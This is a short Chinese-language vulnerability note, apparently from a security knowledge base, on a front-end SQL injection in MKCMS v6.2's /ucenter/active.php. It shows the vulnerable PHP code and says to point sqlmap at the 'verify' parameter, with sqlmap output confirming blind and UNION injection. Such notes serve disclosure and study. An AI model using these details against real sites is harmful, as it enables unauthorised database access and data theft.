menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right MKCMS v6.2 _ucenter_active.php前台sql注入漏洞 chevron_right MKCMS v6.2 _ucenter_active.php前台sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    MKCMS v6.2 _ucenter_active.php前台sql注入漏洞.md
    817 B / 2021-07-15 19:56:49
        MKCMS v6.2 /ucenter/active.php前台sql注入漏洞
=============================================

一、漏洞简介
------------

二、漏洞影响
------------

MKCMS v6.2

三、复现过程
------------

`/ucenter/active.php?verify=1`存在注入

    /ucenter/active.php
    <?php
    ...
    $verify = stripslashes(trim($_GET['verify']));  //去掉了转义用的    $nowtime = time();
    $query = mysql_query("select u_id from mkcms_user where u_question='$verify'");
    $row = mysql_fetch_array($query);
    ...

sqlmap直接跑即可

    [INFO] GET parameter 'verify' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
    [INFO] GET parameter 'verify' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

参考链接
--------

> https://xz.aliyun.com/t/7580\#toc-4
    links
    file_download